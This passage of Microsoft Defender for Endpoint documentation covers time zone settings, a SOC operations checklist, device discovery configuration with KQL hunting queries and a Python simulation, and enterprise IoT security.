AMA cannot be used as a substitute for Defender for Endpoint.

See also
Make the switch from non-Microsoft endpoint protection to Microsoft Defender
for Endpoint
Microsoft Defender for Endpoint deployment overview
Onboard to the Microsoft Defender for Endpoint service


Microsoft Defender XDR time zone settings
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.


Use the Time zone menu to configure the time zone and view license information.

Time zone settings


Time is a critical factor in the assessment and analysis of perceived and actual
cyberattacks.

Cyberforensic investigations often rely on time stamps to piece together the sequence
of events, so it's important that your system reflects the correct time zone settings.

Microsoft Defender for Endpoint can display either Coordinated Universal Time (UTC) or
local time.

Your current time zone setting is shown in the Microsoft Defender for Endpoint menu.
You can change the displayed time zone in the Time zone menu.

UTC time zone

Microsoft Defender for Endpoint uses UTC time by default.
Setting the Microsoft Defender for Endpoint time zone to UTC will display all system
timestamps (alerts, events, and others) in UTC for all users. This can help security
analysts working in different locations across the globe to use the same time stamps
while investigating events.

Local time zone

You can choose to have Microsoft Defender for Endpoint use local time zone settings.
All alerts and events will be displayed using your local time zone.

The local time zone is taken from your device's regional settings. If you change your
regional settings, the Microsoft Defender for Endpoint time zone will also change.
Choosing this setting means that the timestamps displayed in Microsoft Defender for
Endpoint will be aligned to local time for all Microsoft Defender for Endpoint users.
Analysts located in different global locations will now see the Microsoft Defender for
Endpoint alerts according to their regional settings.

Choosing to use local time can be useful if the analysts are located in a single location.
In this case it might be easier to correlate events to local time, for example, when a local
user clicked on a suspicious email link.
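The UTC-versus-local trade-off described above can also be handled inside an advanced hunting query, so that every analyst correlates on the same UTC value while seeing a local rendering next to it. The following KQL is an added example, not a query from this Microsoft article. The zone name "America/Los_Angeles" (UTC-7 during daylight saving time) is an assumption, and it assumes the Kusto datetime_utc_to_local() function is available in your advanced hunting environment.

```kusto
// Added example (not from the Microsoft article): render alerts in one analyst's
// local time without losing the UTC value that every analyst can correlate on.
// The zone name is an assumption; substitute your own IANA time zone.
// Availability of datetime_utc_to_local() in advanced hunting is assumed.
let AnalystTimeZone = "America/Los_Angeles";
AlertInfo
| where Timestamp > ago(1d)
| extend LocalTime = datetime_utc_to_local(Timestamp, AnalystTimeZone)
| project Timestamp, LocalTime, AlertId, Title, Severity, Category
| order by Timestamp asc   // order on the UTC column, not on the local rendering
```

Because Timestamp stays in UTC, two analysts running this query with different AnalystTimeZone values get the same ordering and can quote the same UTC value to each other; only the LocalTime column differs.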

Set the time zone

The Microsoft Defender for Endpoint time zone is set by default to UTC. Setting the time
zone also changes the times for all Microsoft Defender for Endpoint views.

To set the time zone:

1. Click the Time zone menu.
2. Select the Timezone UTC indicator.
3. Select Timezone UTC or your local time zone, for example -7:00.

Regional settings
To apply different date formats for Microsoft Defender for Endpoint, use regional
settings for Internet Explorer (IE) and Microsoft Edge (Edge). If you're using another
browser such as Google Chrome, follow the required steps to change the time and date
settings for that browser.

Internet Explorer (IE) and Microsoft Edge


IE and Microsoft Edge use the Region settings configured in the Clocks, Language, and
Region option in the Control panel.

Known issues with regional formats

Date and time formats

There are some known issues with the time and date formats. If you configure your
regional settings to anything other than the supported formats, the portal may not
correctly reflect your settings.

The following date and time formats are supported:

Date format MM/dd/yyyy
Date format dd/MM/yyyy
Time format hh:mm:ss (12 hour format)

The following date and time formats are currently not supported:

Date format yyyy-MM-dd
Date format dd-MMM-yy
Date format dd/MM/yy
Date format MM/dd/yy
Date format with yy. Will only show yyyy.
Time format HH:mm:ss (24 hour format)

Decimal symbol used in numbers

The decimal symbol used is always a dot, even if a comma is selected in the Numbers
format settings in Region settings. For example, 15,5K is displayed as 15.5K.
Microsoft Defender for Endpoint Security Operations Guide
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

This article gives an overview of the requirements and tasks for successfully operating
Microsoft Defender for Endpoint in your organization. These tasks help your security
operations center (SOC) effectively detect and respond to security threats detected by
Microsoft Defender for Endpoint.

This article also describes daily, weekly, monthly, and ad-hoc tasks your security team
can perform for your organization.

7 Note

These are recommended steps; check them against your own policies and
environment to make sure they are fit for purpose.

Prerequisites

Microsoft Defender for Endpoint should be set up to support your regular security
operations process. Although not covered in this document, the following articles
provide configuration and setup information:

Configure general Defender for Endpoint settings
General
Permissions
Rules
Device management
Configure Microsoft Defender Security Center time zone settings

Set up Microsoft Defender XDR incident notifications

To get email notifications on defined Microsoft Defender XDR incidents, it's
recommended that you configure email notifications. See Get incident notifications
by email.

Connect to SIEM (Sentinel)

If you have existing security information and event management (SIEM) tools, you
can integrate them with Microsoft Defender XDR. See Integrate your SIEM tools
with Microsoft Defender XDR and Microsoft Defender XDR integration with
Microsoft Sentinel.

Review device discovery configuration

Review the Microsoft Defender for Endpoint device discovery configuration to
ensure it's configured as required. See Device discovery overview.

Daily activities

General
Review actions

In the action center, review the actions that have been taken in your environment,
both automated and manual. This information helps you validate that automated
investigation and response (AIR) is performing as expected and identify any
manual actions that need to be reviewed. See Visit the Action center to see
remediation actions.

Security operations team

Monitor the Microsoft Defender XDR Incidents queue

When Microsoft Defender for Endpoint identifies Indicators of compromise (IOCs)
or Indicators of attack (IOAs) and generates an alert, the alert is included in an
incident and displayed in the Incidents queue in the Microsoft Defender portal
(https://security.microsoft.com).

Review these incidents to respond to any Microsoft Defender for Endpoint alerts
and resolve once the incident has been remediated. See Get incident notifications
by email and View and organize the Microsoft Defender for Endpoint Incidents
queue.

Manage false positive and false negative detections

Review the incident queue, identify false positive and false negative detections and
submit them for review. This helps you effectively manage alerts in your
environment and make your alerts more efficient. See Address false
positives/negatives in Microsoft Defender for Endpoint.

Review threat analytics high-impact threats

Review threat analytics to identify any campaigns that are impacting your
environment. The "High-impact threats" table lists the threats that have had the
highest impact to the organization. This section ranks threats by the number of
devices that have active alerts. See Track and respond to emerging threats through
threat analytics.

Security administration team


Review health reports

Review health reports to identify any device health trends that need to be
addressed. The device health reports cover Microsoft Defender for Endpoint AV
signature, platform health, and EDR health. See Device health reports in Microsoft
Defender for Endpoint.

Check Endpoint detection and response (EDR) sensor health

EDR health means the device maintains its connection to the EDR service, so that
Defender for Endpoint receives the signals it needs to raise alerts and identify
vulnerabilities.

Review unhealthy devices. See Device health, Sensor health & OS report.

Check Microsoft Defender Antivirus health

Viewing the status of Microsoft Defender Antivirus updates is critical for the best
performance of Defender for Endpoint in your environment and up-to-date
detections. The device health page shows current status for platform, intelligence,
and engine version. See the Device health, Microsoft Defender Antivirus health
report.

Weekly activities

General
Message Center
Microsoft Defender XDR uses the Microsoft 365 Message center to notify you of
upcoming changes, such as new and changed features, planned maintenance, or
other important announcements.

Review the Message center messages to understand any upcoming changes that
impact your environment.

You can access this in the Microsoft 365 admin center under the Health tab. See
How to check Microsoft 365 service health.

Security operations team


Review threat reporting

Review health reports to identify any device threat trends that need to be
addressed. See Threat protection report.

Review threat analytics

Review threat analytics to identify any campaigns that affect your environment. See
Track and respond to emerging threats through threat analytics.

Security administration team


Review threat and vulnerability (TVM) status

Review TVM to identify any new vulnerabilities and recommendations that require
action. See Vulnerability management dashboard.

Review attack surface reduction reporting

Review ASR reports to identify any files that affect your environment. See Attack
surface reduction rules report.

Review web protection events

Review the web defense report to identify any IP addresses or URLs that are
blocked. See Web protection.

Monthly activities

General
Review the following articles to understand recently released updates:

What's new in Microsoft Defender for Endpoint

What's new in Microsoft Defender for Endpoint on Windows

What's new in Microsoft Defender for Endpoint on Mac

What's new in Microsoft Defender for Endpoint on Linux

What's new in Microsoft Defender for Endpoint on iOS

What's new in Microsoft Defender for Endpoint on Android

Security administration team


Review devices excluded from policy

If any devices are excluded from Defender for Endpoint policies, review and
determine whether each device still needs to be excluded from the policy.

Note

For troubleshooting, see Get started with troubleshooting mode in Microsoft
Defender for Endpoint.

Periodically
These tasks are seen as maintenance for your security posture and are critical for your
ongoing protection. But as they may take time and effort, it's recommended that you
set a standard schedule that you can maintain to perform these tasks.

Review exclusions

Review exclusions that have been set in your environment to confirm you haven't
created a protection gap by excluding things that are no longer required to be
excluded.

Review Defender policy configurations

Periodically review your Defender configuration settings to confirm that they're set
as required.

Review automation levels


Review automation levels in automated investigation and remediation capabilities.
See Automation levels in automated investigation and remediation.

Review custom detections

Periodically review whether the custom detections that have been created are still
valid and effective. See Review custom detection.

Review alerts suppression

Periodically review any alert suppression rules that have been created to confirm
they're still required and valid. See Review alerts suppression.

Troubleshooting
The following articles provide guidance to troubleshoot and fix errors that you may
experience when setting up your Microsoft Defender for Endpoint service.

Troubleshoot sensor state
Troubleshoot sensor health issues using Client Analyzer
Troubleshoot live response issues
Collect support logs using LiveAnalyzer
Troubleshoot attack surface reduction issues
Troubleshoot onboarding issues


Microsoft Defender Vulnerability
Management
Reduce cyber risk with continuous vulnerability discovery and assessment, risk-based
prioritization, and remediation.

Overview

OVERVIEW

What is Microsoft Defender Vulnerability Management?

Compare Microsoft Defender Vulnerability Management offerings

Get started

GET STARTED

Get Defender Vulnerability Management

Discover and explore inventories

HOW-TO GUIDE

Device inventory

Software inventory

Browser extensions

Certificate inventory

Hardware and firmware assessment

Detect and assess threats

HOW-TO GUIDE

Dashboard insights
Exposure score

Microsoft Secure Score for Devices

Security baselines

Hunt for exposed devices

Authenticated scan for Windows

Identify risk and prioritize remediation

HOW-TO GUIDE

Address security recommendations

Network share configuration assessment

Exceptions for security recommendations

Plan for end-of-support software

Mitigate zero-day vulnerabilities

Vulnerabilities in my organization

Event timeline

Track and mitigate remediation activities

HOW-TO GUIDE

Remediate vulnerabilities

Block vulnerable applications

Vulnerable devices report


Device discovery overview
Article • 05/11/2023

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Protecting your environment requires taking inventory of the devices that are in your
network. However, mapping devices in a network can often be expensive, challenging,
and time-consuming.

Microsoft Defender for Endpoint provides a device discovery capability that helps you
find unmanaged devices connected to your corporate network without the need for
extra appliances or cumbersome process changes. Device discovery uses onboarded
endpoints in your network to collect, probe, or scan your network to discover
unmanaged devices. The device discovery capability allows you to discover:

Enterprise endpoints (workstations, servers and mobile devices) that aren't yet
onboarded to Microsoft Defender for Endpoint
Network devices like routers and switches
IoT devices like printers and cameras

Unknown and unmanaged devices introduce significant risks to your network - whether
it's an unpatched printer, network devices with weak security configurations, or a server
with no security controls. Once devices are discovered, you can:

Onboard unmanaged endpoints to the service, increasing the security visibility on
them.
Reduce the attack surface by identifying and assessing vulnerabilities, and
detecting configuration gaps.

Watch this video for a quick overview of how to assess and onboard unmanaged devices
that Microsoft Defender for Endpoint discovered.
https://www.microsoft.com/en-us/videoplayer/embed/RE4RwQz?postJsllMsg=true

In conjunction with this capability, a security recommendation to onboard devices to
Microsoft Defender for Endpoint is available as part of the existing Microsoft Defender
Vulnerability Management experience.

Discovery methods
You can choose the discovery mode to be used by your onboarded devices. The mode
controls the level of visibility you can get for unmanaged devices in your corporate
network.

There are two modes of discovery available:

Basic discovery: In this mode, endpoints passively collect events in your network
and extract device information from them. Basic discovery uses the SenseNDR.exe
binary for passive network data collection, and no network traffic is initiated.
Endpoints extract data from all network traffic that is seen by an onboarded
device. With basic discovery, you'll only gain limited visibility of unmanaged
endpoints in your network.

Standard discovery (recommended): This mode allows endpoints to actively find
devices in your network to enrich collected data and discover more devices,
helping you build a reliable and coherent device inventory. In addition to devices
that were observed using the passive method, standard mode also uses
common discovery protocols that use multicast queries in the network to find even
more devices. Standard mode uses smart, active probing to discover additional
information about observed devices to enrich existing device information. When
Standard mode is enabled, minimal and negligible network activity generated by
the discovery sensor might be observed by network monitoring tools in your
organization.

You can change and customize your discovery settings. For more information, see
Configure device discovery.

Important

Standard discovery is the default mode for all customers starting July 19, 2021. You
can choose to change this configuration to basic through the settings page. If you
choose basic mode, you'll only gain limited visibility of unmanaged endpoints in
your network.

Note

The discovery engine distinguishes between network events that are received in the
corporate network versus outside of the corporate network. Devices that are not
connected to corporate networks will not be discovered or listed in the device
inventory.

Device inventory

Devices that have been discovered but haven't yet been onboarded and secured by
Microsoft Defender for Endpoint are listed in the device inventory within the Computers
and Mobile tab.

To assess these devices, you can use a filter in the device inventory list called
Onboarding status, which can have any of the following values:

Onboarded: The endpoint is onboarded to Microsoft Defender for Endpoint.
Can be onboarded: The endpoint was discovered in the network and the Operating
System was identified as one that is supported by Microsoft Defender for Endpoint,
but it isn't currently onboarded. We highly recommend onboarding these devices.
Unsupported: The endpoint was discovered in the network but isn't supported by
Microsoft Defender for Endpoint.
Insufficient info: The system couldn't determine the supportability of the device.
Enabling standard discovery on more devices in the network can enrich the
discovered attributes.
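To size the backlog behind the Onboarding status filter, the following advanced hunting query is an added example, not a query from this Microsoft article. It follows the same DeviceInfo conventions as the discovery queries later on this page (latest record per DeviceId, merged devices dropped); the seven-day window and the five example names per group are assumptions.

```kusto
// Added example (not from the Microsoft article): count discovered, non-onboarded
// devices by onboarding status, device type and OS platform.
// The 7-day window and the 5 sample names per group are assumptions.
DeviceInfo
| where Timestamp > ago(7d)
| summarize arg_max(Timestamp, *) by DeviceId   // latest known record per device
| where isempty(MergedToDeviceId)               // drop records merged into another device
| where OnboardingStatus != "Onboarded"
| summarize Devices  = dcount(DeviceId),
            LastSeen = max(Timestamp),
            Examples = make_set(DeviceName, 5)
    by OnboardingStatus, DeviceType, OSPlatform
| order by OnboardingStatus asc, Devices desc
```

The Can be onboarded rows are the ones the page recommends acting on. A large Insufficient info group in one device type or platform is a hint that standard discovery is not enabled on enough onboarded devices in that part of the network.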

Tip

You can always apply filters to exclude unmanaged devices from the device
inventory list. You can also use the onboarding status column on API queries to
filter out unmanaged devices.

For more information, see Device inventory.


Network device discovery

The large number of unmanaged network devices deployed in an organization creates a
large attack surface and represents a significant risk to the entire enterprise.
Microsoft Defender for Endpoint network discovery capabilities help you ensure
network devices are discovered, accurately classified, and added to the asset inventory.

Network devices aren't managed as standard endpoints, as Defender for Endpoint
doesn't have a sensor built into the network devices themselves. These types of devices
require an agentless approach where a remote scan obtains the necessary information
from the devices. To do this, a designated Microsoft Defender for Endpoint device is
used on each network segment to perform periodic authenticated scans of
preconfigured network devices. Defender for Endpoint's vulnerability management
capabilities provide integrated workflows to secure discovered switches, routers, WLAN
controllers, firewalls, and VPN gateways.

For more information, see Network devices.

Device discovery integration

To address the challenge of gaining enough visibility to locate, identify, and secure your
complete OT/IoT asset inventory, Microsoft Defender for Endpoint now supports the
following integration:

Microsoft Defender for IoT: This integration combines Microsoft Defender for
Endpoint's device discovery capabilities, with the agentless monitoring capabilities
of Microsoft Defender for IoT, to secure enterprise IoT devices connected to an IT
network (for example, Voice over Internet Protocol (VoIP), printers, and smart TVs).
For more information, see Enable Enterprise IoT security with Defender for
Endpoint.

Vulnerability assessment on discovered devices

Vulnerabilities and risks on your devices, as well as on other discovered unmanaged
devices in the network, are part of the current Defender Vulnerability Management flows
under "Security Recommendations" and are represented in entity pages across the portal.
Search for "SSH"-related security recommendations to find SSH vulnerabilities that apply
to unmanaged and managed devices.

Use advanced hunting on discovered devices


You can use advanced hunting queries to gain visibility on discovered devices. Find
details about discovered devices in the DeviceInfo table, or network-related information
about those devices, in the DeviceNetworkInfo table.

Query discovered device details

Run this query on the DeviceInfo table to return all discovered devices along with the
most up-to-date details for each device:

Kusto

DeviceInfo
| summarize arg_max(Timestamp, *) by DeviceId // Get the latest known good record per DeviceId
| where isempty(MergedToDeviceId) // Remove invalidated/merged devices
| where OnboardingStatus != "Onboarded"

By invoking the SeenBy function in your advanced hunting query, you can get details on
which onboarded device a discovered device was seen by. This information can help
determine the network location of each discovered device and, in turn, help you
identify it in the network.

Kusto

DeviceInfo
| where OnboardingStatus != "Onboarded"
| summarize arg_max(Timestamp, *) by DeviceId
| where isempty(MergedToDeviceId)
| limit 100
| invoke SeenBy()
| project DeviceId, DeviceName, DeviceType, SeenBy

For more information, see the SeenBy() function.

Query network related information

Device discovery uses Microsoft Defender for Endpoint onboarded devices as a
network data source to attribute activities to non-onboarded devices. The network
sensor on the Microsoft Defender for Endpoint onboarded device identifies two new
connection types:

ConnectionAttempt - An attempt to establish a TCP connection (SYN)
ConnectionAcknowledged - An acknowledgment that a TCP connection was
accepted (SYN/ACK)

This means that when a non-onboarded device attempts to communicate with an
onboarded Microsoft Defender for Endpoint device, the attempt generates a
DeviceNetworkEvent, and the non-onboarded device's activities can be seen on the
onboarded device's timeline and in the advanced hunting DeviceNetworkEvents
table.

You can try this example query:

Kusto

DeviceNetworkEvents
| where ActionType == "ConnectionAcknowledged" or ActionType == "ConnectionAttempt"
| take 10
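Going one step past the page's sample query, the following added example (not a query from this Microsoft article) aggregates the two discovery connection types per remote address, so that a non-onboarded device that reaches many onboarded devices stands out for review. It takes the traffic direction from the page's description (the remote address is the side that sent the SYN, the onboarded device is the side that recorded it); the seven-day window and the threshold of five target devices are assumptions.

```kusto
// Added example (not from the Microsoft article): rank non-onboarded sources by
// the number of onboarded devices they connected to. The window and the
// threshold are assumptions; tune them to your environment.
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where ActionType in ("ConnectionAttempt", "ConnectionAcknowledged")
| summarize Attempts      = countif(ActionType == "ConnectionAttempt"),
            Acknowledged  = countif(ActionType == "ConnectionAcknowledged"),
            TargetDevices = dcount(DeviceId),        // distinct onboarded devices touched
            TargetPorts   = make_set(LocalPort, 20), // ports on the onboarded side
            FirstSeen     = min(Timestamp),
            LastSeen      = max(Timestamp)
    by RemoteIP
| where TargetDevices >= 5
| order by TargetDevices desc, Attempts desc
```

To turn a RemoteIP in the result into a discovered device, look it up against the IPAddresses column of DeviceNetworkInfo for non-onboarded devices, or open the onboarded device's timeline as the page describes. A source with many Attempts, few Acknowledged and a wide TargetPorts set is the pattern worth a closer look first.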

Next steps
Configure device discovery
Device discovery FAQs


Configure device discovery
Article • 04/06/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Discovery can be configured to be on standard or basic mode. Use the standard option
to actively find devices in your network, which will better guarantee the discovery of
endpoints and provide richer device classification.

You can customize the list of devices that are used to perform standard discovery. You
can either enable standard discovery on all the onboarded devices that also support this
capability (currently - Windows 10 or later and Windows Server 2019 or later devices
only) or select a subset or subsets of your devices by specifying their device tags.

Set up device discovery

To set up device discovery, take the following configuration steps in the Microsoft
Defender portal:

Navigate to Settings > Device discovery.

1. If you want to configure Basic as the discovery mode to use on your onboarded
devices, select Basic and then select Save.
2. If you've selected to use Standard discovery, select which devices to use for active
probing: all devices or a subset by specifying their device tags, and then select
Save.

Note

Standard discovery uses various PowerShell scripts to actively probe devices in the
network. Those PowerShell scripts are Microsoft signed and are executed from the
following location: C:\ProgramData\Microsoft\Windows Defender Advanced Threat
Protection\Downloads\*.ps. For example, C:\ProgramData\Microsoft\Windows
Defender Advanced Threat Protection\Downloads\UnicastScannerV1.1.0.ps1.

Exclude devices from being actively probed in standard discovery

If there are devices on your network that shouldn't be actively scanned (for example,
devices used as honeypots for another security tool), you can also define a list of
exclusions to prevent them from being scanned. Note that devices can still be
discovered using Basic discovery mode and can also be discovered through multicast
discovery attempts. Those devices will be passively discovered but won't be actively
probed.

You can configure the devices to exclude in the Exclusions page.

Select networks to monitor

Microsoft Defender for Endpoint analyzes a network and determines if it's a corporate
network that needs to be monitored or a non-corporate network that can be ignored. To
identify a network as corporate, we correlate network identifiers across all of the tenant's
clients; if most devices in the organization report that they're connected to the same
network name, with the same default gateway and DHCP server address, we assume
that this is a corporate network. Corporate networks are typically chosen to be
monitored. However, you can override this decision by choosing to monitor
non-corporate networks where onboarded devices are found.

You can configure where device discovery can be performed by specifying which
networks to monitor. When a network is monitored, device discovery can be performed
on it.

A list of networks where device discovery can be performed is shown in the Monitored
networks page.

Note

The list shows networks that were identified as corporate networks. If fewer than 50
networks are identified as corporate networks, the list shows up to 50 networks
with the most onboarded devices.

The list of monitored networks is sorted based upon the total number of devices seen
on the network in the last seven days.

You can apply a filter to view any of the following network discovery states:

Monitored networks - Networks where device discovery is performed.
Ignored networks - Networks that are ignored; device discovery isn't performed
on them.
All - Both monitored and ignored networks are displayed.

Configure the network monitor state


You control where device discovery takes place. Monitored networks are where device
discovery is performed and are typically corporate networks. You can also choose to
ignore networks or select the initial discovery classification after modifying a state.

Choosing the initial discovery classification means applying the default system-made
network monitor state. Selecting the default system-made network monitor state means
that networks identified as corporate are monitored, and networks identified as
non-corporate are ignored automatically.

1. Select Settings > Device discovery.

2. Select Monitored networks.

3. View the list of networks.

4. Select the three dots next to the network name.

5. Choose whether you want to monitor, ignore, or use the initial discovery
classification.

Warning

Choosing to monitor a network that was not identified by Microsoft Defender for
Endpoint as a corporate network can cause device discovery outside of your
corporate network, and may therefore detect home or other non-corporate devices.

Choosing to ignore a network will stop monitoring and discovering devices in that
network. Devices that were already discovered won't be removed from the inventory,
but will no longer be updated, and details will be retained until the data retention
period of Defender for Endpoint expires.

Before choosing to monitor non-corporate networks, you must ensure you have
permission to do so.

6. Confirm that you want to make the change.

Explore devices in the network


You can use the following advanced hunting query to get more context about each
network name described in the networks list. The query lists all the onboarded devices
that were connected to a certain network within the last seven days.

Kusto

DeviceNetworkInfo
| where Timestamp > ago(7d)
| where ConnectedNetworks != ""
| extend ConnectedNetworksExp = parse_json(ConnectedNetworks)
| mv-expand bagexpansion = array ConnectedNetworks=ConnectedNetworksExp
| extend NetworkName = tostring(ConnectedNetworks["Name"]),
    Description = tostring(ConnectedNetworks["Description"]),
    NetworkCategory = tostring(ConnectedNetworks["Category"])
| where NetworkName == "<your network name here>"
| summarize arg_max(Timestamp, *) by DeviceId
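To make concrete what this query returns, and how the corporate-network heuristic described under "Select networks to monitor" works, here is an added Python simulation over constructed DeviceNetworkInfo-style rows. It is not Microsoft's code; the Gateway and DhcpServer fields are simplified stand-ins for the table's gateway and DHCP columns, and all device names, network names and addresses are constructed.

```python
"""Added simulation of the hunting query above plus the corporate-network heuristic
from "Select networks to monitor". Constructed data; not Microsoft's code."""
import json
from collections import defaultdict
from datetime import datetime, timedelta, timezone

NOW = datetime(2024, 1, 19, tzinfo=timezone.utc)  # constructed "now" for the ago(7d) window


def row(device, days_ago, networks, gateway="", dhcp=""):
    """One constructed DeviceNetworkInfo-style row. ConnectedNetworks is a JSON string,
    as in the real table; Gateway/DhcpServer are simplified stand-ins (assumption) for
    the table's gateway and DHCP columns."""
    return {
        "Timestamp": NOW - timedelta(days=days_ago),
        "DeviceId": device,
        "ConnectedNetworks": json.dumps(networks) if networks else "",
        "Gateway": gateway,
        "DhcpServer": dhcp,
    }


def net(name, description, category="Domain"):
    """One entry of the ConnectedNetworks array (Name, Description, Category)."""
    return {"Name": name, "Description": description, "Category": category}


CORP = ("10.0.0.1", "10.0.0.2")        # constructed corporate gateway / DHCP server
HOME = ("192.168.1.1", "192.168.1.1")  # constructed home router doing both jobs

SAMPLE_ROWS = [
    row("dev-01", 3, [net("corp.example", "Wi-Fi")], *CORP),
    row("dev-01", 1, [net("corp.example", "Ethernet")], *CORP),      # newest dev-01 row
    row("dev-02", 2, [net("corp.example", "Ethernet"),
                      net("Guest", "Wi-Fi", "Public")], *CORP),      # two entries -> mv-expand
    row("dev-03", 5, [net("corp.example", "Ethernet")], *CORP),
    row("dev-04", 10, [net("corp.example", "Ethernet")], *CORP),     # older than 7 days
    row("dev-05", 1, [net("HomeWifi", "Wi-Fi", "Private")], *HOME),
    row("dev-05", 2, []),                                             # ConnectedNetworks == ""
]


def expand_networks(rows):
    """Emulate `where ConnectedNetworks != ""`, parse_json and mv-expand:
    yield one (row, network) pair per element of the ConnectedNetworks array."""
    for r in rows:
        if r["ConnectedNetworks"] == "":
            continue
        for n in json.loads(r["ConnectedNetworks"]):
            yield r, n


def classify_networks(rows):
    """A network is corporate when most devices in the organization report the same
    network name together with the same default gateway and DHCP server address."""
    all_devices = {r["DeviceId"] for r in rows}
    reporters = defaultdict(set)  # (name, gateway, dhcp) -> devices that reported it
    for r, n in expand_networks(rows):
        reporters[(n["Name"], r["Gateway"], r["DhcpServer"])].add(r["DeviceId"])
    verdict = {}
    for (name, _gw, _dhcp), devices in reporters.items():
        majority = len(devices) * 2 > len(all_devices)
        if majority or name not in verdict:   # a corporate verdict is never downgraded
            verdict[name] = "corporate" if majority else "non-corporate"
    return verdict


def devices_on_network(rows, network_name, window_days=7):
    """Emulate the rest of the query: time window, NetworkName filter, then
    arg_max(Timestamp, *) by DeviceId. Returns {DeviceId: newest matching row}."""
    since = NOW - timedelta(days=window_days)
    newest = {}
    for r, n in expand_networks(rows):
        if r["Timestamp"] <= since or n["Name"] != network_name:
            continue
        hit = {"Timestamp": r["Timestamp"], "NetworkName": n["Name"],
               "Description": n["Description"], "NetworkCategory": n["Category"]}
        prev = newest.get(r["DeviceId"])
        if prev is None or hit["Timestamp"] > prev["Timestamp"]:
            newest[r["DeviceId"]] = hit
    return newest


if __name__ == "__main__":
    print(classify_networks(SAMPLE_ROWS))
    for dev, info in sorted(devices_on_network(SAMPLE_ROWS, "corp.example").items()):
        print(dev, info["Description"], info["Timestamp"].date())
```

Running it shows dev-04 dropped by the seven-day window and only the newest of dev-01's two rows surviving the arg_max step, while the home network is classified as non-corporate because only one of five devices reports it.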

Get information on device


You can use the following advanced hunting query to get the latest complete
information on a specific device.

Kusto

DeviceInfo
| where DeviceName == "<device name here>" and isnotempty(OSPlatform)
| summarize arg_max(Timestamp, *) by DeviceId

See also
Device discovery overview
Device discovery FAQs



Securing IoT devices in the enterprise
Article • 12/07/2023

The number of IoT devices continues to grow exponentially across enterprise networks,
such as printers, Voice over Internet Protocol (VoIP) devices, smart TVs, and
conferencing systems scattered around many office buildings.

While the number of IoT devices continues to grow, they often lack the security
safeguards that are common on managed endpoints like laptops and mobile phones. To
bad actors, these unmanaged devices can be used as a point of entry for lateral
movement or evasion, and too often, the use of such tactics leads to the exfiltration of
sensitive information.

Microsoft Defender for IoT seamlessly integrates with Microsoft Defender XDR and
Microsoft Defender for Endpoint to provide both IoT device discovery and security value
for IoT devices, including purpose-built alerts, recommendations, and vulnerability data.

Enterprise IoT security in Microsoft Defender XDR

Enterprise IoT security in Microsoft Defender XDR provides IoT-specific security value,
including alerts, risk and exposure levels, vulnerabilities, and recommendations in
Microsoft Defender XDR.

If you're a Microsoft 365 E5 (ME5)/E5 Security and Defender for Endpoint P2
customer, toggle on support for Enterprise IoT Security in the Microsoft Defender
Portal.

If you don't have ME5/E5 Security licenses, but you're a Microsoft Defender for
Endpoint customer, start with a free trial or purchase standalone, per-device
licenses to gain the same IoT-specific security value.

Alerts
Most Microsoft Defender for Endpoint network-based detections are also relevant for
Enterprise IoT devices. For example, network-based detections include alerts for scans
involving managed endpoints.

For more information, see Alerts queue in Microsoft 365 Defender.

Recommendations
The following Defender for Endpoint security recommendations are supported for
Enterprise IoT devices:

Require authentication for Telnet management interface
Disable insecure administration protocol – Telnet
Remove insecure administration protocols SNMP V1 and SNMP V2
Require authentication for VNC management interface

For more information, see Security recommendations.

Frequently asked questions


This section provides a list of frequently asked questions about securing Enterprise IoT
networks with Microsoft Defender for IoT.

What is the difference between OT and Enterprise IoT?


Operational Technology (OT): OT network sensors use agentless, patented
technology to discover, learn, and continuously monitor network devices for a
deep visibility into Operational Technology (OT) / Industrial Control System (ICS)
risks. Sensors carry out data collection, analysis, and alerting on-site, making them
ideal for locations with low bandwidth or high latency.

Enterprise IoT: Enterprise IoT provides visibility and security for IoT devices in the
corporate environment.

Enterprise IoT network protection extends agentless features beyond operational
environments, providing coverage for all IoT devices in your environment. For
example, an enterprise IoT environment might include printers, cameras, and
purpose-built, proprietary devices.

Which devices are supported for Enterprise IoT security?


Enterprise IoT security encompasses a broad spectrum of devices, identified by Defender
for Endpoint using both passive and active discovery methods.

The supported devices include an extensive range of hardware models and vendors,
spanning corporate IoT devices such as printers, cameras, and VoIP phones, among
others.

For more information, see Defender for IoT devices.

How can I start using Enterprise IoT?


Microsoft E5 (ME5) and E5 Security customers already have devices supported for
enterprise IoT security. If you only have a Defender for Endpoint P2 license, you can
purchase standalone, per-device licenses for enterprise IoT monitoring, or use a trial.

For more information, see:

Get started with enterprise IoT monitoring in Microsoft Defender XDR
Manage enterprise IoT monitoring support with Microsoft Defender for IoT

What permissions do I need to use Enterprise IoT security with Defender for IoT?

For information on required permissions, see Prerequisites.

Which devices are billable?


For more information, see Devices monitored by Defender for IoT.

How should I estimate the number of devices I want to monitor?

For more information, see Calculate monitored devices for Enterprise IoT monitoring.

How can I cancel Enterprise IoT?


For more information, see Turn off enterprise IoT security.

What happens when the trial ends?


If you haven't added a standalone license by the time your trial ends, your trial is
automatically canceled, and you lose access to Enterprise IoT security features.

For more information, see Defender for IoT subscription billing.

How can I resolve billing issues associated with my Defender for IoT plan?

For any billing or technical issues, open a support ticket for Microsoft Defender XDR.

Related content
For more information, see:

Get started with enterprise IoT monitoring in Microsoft 365 Defender
Defender for IoT subscription billing
Device discovery overview
Alerts queue in Microsoft 365 Defender
Security recommendations
Vulnerabilities in my organization
Manage your device inventory from the Azure portal
Proactively hunt with advanced hunting in Microsoft 365 Defender

Next steps
Start securing your Enterprise IoT network resources by onboarding to Defender for
IoT from Microsoft Defender XDR.

Get started with enterprise IoT monitoring in Microsoft Defender XDR
Article • 12/07/2023

This article describes how Microsoft Defender for Endpoint customers can monitor
enterprise IoT devices in their environment, using added security value in Microsoft
Defender XDR.

While IoT device inventory is already available for Defender for Endpoint P2 customers,
turning on enterprise IoT security adds alerts, recommendations, and vulnerability data,
purpose-built for IoT devices in your enterprise network.

IoT devices include printers, cameras, VOIP phones, smart TVs, and more. Turning on
enterprise IoT security means, for example, that you can use a recommendation in
Microsoft Defender XDR to open a single IT ticket for patching vulnerable applications
across both servers and printers.

Prerequisites
